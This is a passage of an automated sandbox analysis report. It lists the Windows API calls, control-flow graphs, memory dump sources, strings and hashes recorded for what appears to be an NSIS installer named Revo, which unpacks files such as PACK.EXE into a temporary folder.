                                                                                                                                              • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                              • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                              • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\
                                                                                                                                              • API String ID: 2531174081-930084628
                                                                                                                                              • Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                              • Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
                                                                                                                                              • Opcode Fuzzy Hash: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                              • Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 694 401794-4017b9 call 402dcb call 405fe8 699 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 694->699 700 4017bb-4017c1 call 4066a2 694->700 705 4017da-4017db call 406950 699->705 700->705 709 4017e0-4017e4 705->709 710 4017e6-4017f0 call 4069ff 709->710 711 401817-40181a 709->711 718 401802-401814 710->718 719 4017f2-401800 CompareFileTime 710->719 713 401822-40183e call 406192 711->713 714 40181c-40181d call 40616d 711->714 721 401840-401843 713->721 722 4018b2-4018db call 405727 call 403396 713->722 714->713 718->711 719->718 724 401894-40189e call 405727 721->724 725 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 721->725 735 4018e3-4018ef SetFileTime 722->735 736 4018dd-4018e1 722->736 737 4018a7-4018ad 724->737 725->709 757 401889-40188a 725->757 740 4018f5-401900 CloseHandle 735->740 736->735 736->740 738 402c58 737->738 741 402c5a-402c5e 738->741 743 401906-401909 740->743 744 402c4f-402c52 740->744 746 40190b-40191c call 4066df lstrcatW 743->746 747 40191e-401921 call 4066df 743->747 744->738 753 401926-4023c7 call 405d02 746->753 747->753 753->741 760 402953-40295a 753->760 757->737 759 40188c-40188d 757->759 759->724 760->744
                                                                                                                                              APIs
                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017D5
                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\PACK.EXE,C:\Users\user\AppData\Local\Temp\PACK.EXE,00000000,00000000,C:\Users\user\AppData\Local\Temp\PACK.EXE,004C5000,?,?,00000031), ref: 004017FA
                                                                                                                                                • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\PACK.EXE$C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dll
                                                                                                                                              • API String ID: 1941528284-2255288322
                                                                                                                                              • Opcode ID: e754ad755ac4ebc946d1f76660a4366266a33e6d35abd67097047bb5803dd91e
                                                                                                                                              • Instruction ID: 9f42f1e7eaebfaebc1b2313fce90f35831c5a59d22c64b0766d7391dfec550b2
                                                                                                                                              • Opcode Fuzzy Hash: e754ad755ac4ebc946d1f76660a4366266a33e6d35abd67097047bb5803dd91e
                                                                                                                                              • Instruction Fuzzy Hash: 0541D771800114BACF117BB5CD85DAE3679EF45368B21863FF422F11E1D73D8AA19A2D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 761 402711-40272a call 402da9 764 402730-402737 761->764 765 402c4f-402c52 761->765 766 402739 764->766 767 40273c-40273f 764->767 768 402c58-402c5e 765->768 766->767 770 4028a3-4028ab 767->770 771 402745-402754 call 406602 767->771 770->765 771->770 774 40275a 771->774 775 402760-402764 774->775 776 4027f9-4027fc 775->776 777 40276a-402785 ReadFile 775->777 779 402814-402824 call 406215 776->779 780 4027fe-402801 776->780 777->770 778 40278b-402790 777->778 778->770 781 402796-4027a4 778->781 779->770 788 402826 779->788 780->779 782 402803-40280e call 406273 780->782 784 4027aa-4027bc MultiByteToWideChar 781->784 785 40285f-40286b call 4065e9 781->785 782->770 782->779 784->788 789 4027be-4027c1 784->789 785->768 792 402829-40282c 788->792 793 4027c3-4027ce 789->793 792->785 795 40282e-402833 792->795 793->792 796 4027d0-4027f5 SetFilePointer MultiByteToWideChar 793->796 797 402870-402874 795->797 798 402835-40283a 795->798 796->793 799 4027f7 796->799 801 402891-40289d SetFilePointer 797->801 802 402876-40287a 797->802 798->797 800 40283c-40284f 798->800 799->788 800->770 803 402851-402857 800->803 801->770 804 402882-40288f 802->804 805 40287c-402880 802->805 803->775 806 40285d 803->806 804->770 805->801 805->804 806->770
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                              • String ID: 9
                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                              • Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                              • Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
                                                                                                                                              • Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                              • Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 807 403053-403062 808 403064-40306b 807->808 809 40307c-403082 807->809 810 403074-40307a 808->810 811 40306d-40306e DestroyWindow 808->811 812 403084-403085 call 406ad2 809->812 813 40308c-403098 GetTickCount 809->813 814 4030f2-4030f4 810->814 811->810 817 40308a 812->817 813->814 816 40309a-4030a0 813->816 818 4030a2-4030a9 816->818 819 4030cf-4030ec CreateDialogParamW ShowWindow 816->819 817->814 818->814 820 4030ab-4030cd call 403037 wsprintfW call 405727 818->820 819->814 820->814
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040308C
                                                                                                                                              • wsprintfW.USER32 ref: 004030BA
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                                                                                                                • Part of subcall function 00403037: MulDiv.KERNEL32(00003F10,00000064,00006606), ref: 0040304C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                              • String ID: ... %d%%
                                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                                              • Opcode ID: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
                                                                                                                                              • Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
                                                                                                                                              • Opcode Fuzzy Hash: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
                                                                                                                                              • Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 825 402fb8-402fc8 826 402fe3-402fea 825->826 827 402fca-402fdc SetTimer 825->827 828 403031-403034 826->828 829 402fec-402ffd call 403037 826->829 827->826 832 403004-40302c wsprintfW SetWindowTextW SetDlgItemTextW 829->832 833 402fff 829->833 832->828 833->832
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                              • wsprintfW.USER32 ref: 0040300A
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                              • Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                              • Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
                                                                                                                                              • Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                              • Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 834 402975-40298e call 402dcb call 405fe8 839 402990-402992 call 402dcb 834->839 840 402997-4029b0 call 40616d call 406192 834->840 839->840 846 402a60-402a65 840->846 847 4029b6-4029bf 840->847 850 402a67-402a73 DeleteFileW 846->850 851 402a7a 846->851 848 4029c5-4029dc GlobalAlloc 847->848 849 402a48-402a5a call 403396 CloseHandle 847->849 848->849 852 4029de-4029fb call 40361d call 403607 GlobalAlloc 848->852 849->846 850->851 859 402a31-402a44 call 406244 GlobalFree 852->859 860 4029fd-402a05 call 403396 852->860 859->849 863 402a0a 860->863 865 402a24-402a26 863->865 866 402a28-402a2b GlobalFree 865->866 867 402a0c-402a21 call 40614d 865->867 866->859 867->865
                                                                                                                                              APIs
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00402A3E
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                              • Opcode ID: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
                                                                                                                                              • Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
                                                                                                                                              • Opcode Fuzzy Hash: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
                                                                                                                                              • Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 870 40349e-4034c6 GetTickCount 871 4035f6-4035f8 call 403053 870->871 872 4034cc-4034f7 call 40361d SetFilePointer 870->872 875 4035fd-4035fe 871->875 877 4034fc-40350e 872->877 878 403600-403604 875->878 879 403510 877->879 880 403512-403520 call 403607 877->880 879->880 883 403526-403532 880->883 884 4035e8-4035eb 880->884 885 403538-40353e 883->885 884->878 886 403540-403546 885->886 887 403569-403585 call 406c11 885->887 886->887 888 403548-403563 call 403053 886->888 893 4035f1 887->893 894 403587-40358f 887->894 892 403568 888->892 892->887 895 4035f3-4035f4 893->895 896 403591-403599 call 406244 894->896 897 4035b2-4035b8 894->897 895->878 900 40359e-4035a0 896->900 897->893 899 4035ba-4035bc 897->899 899->893 901 4035be-4035d1 899->901 902 4035a2-4035ae 900->902 903 4035ed-4035ef 900->903 901->877 904 4035d7-4035e6 SetFilePointer 901->904 902->885 905 4035b0 902->905 903->895 904->871 905->901
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 004034B2
                                                                                                                                                • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                                                                                                              • SetFilePointer.KERNEL32(00075088,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer$CountTick
                                                                                                                                              • String ID: hA$B
                                                                                                                                              • API String ID: 1092082344-3967375562
                                                                                                                                              • Opcode ID: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
                                                                                                                                              • Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
                                                                                                                                              • Opcode Fuzzy Hash: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
                                                                                                                                              • Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                              • wsprintfW.USER32 ref: 00404F78
                                                                                                                                              • SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                              • String ID: %u.%u%s%s$H'D
                                                                                                                                              • API String ID: 3540041739-2781796796
                                                                                                                                              • Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                              • Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
                                                                                                                                              • Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                              • Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                              • wsprintfW.USER32 ref: 00406A78
                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
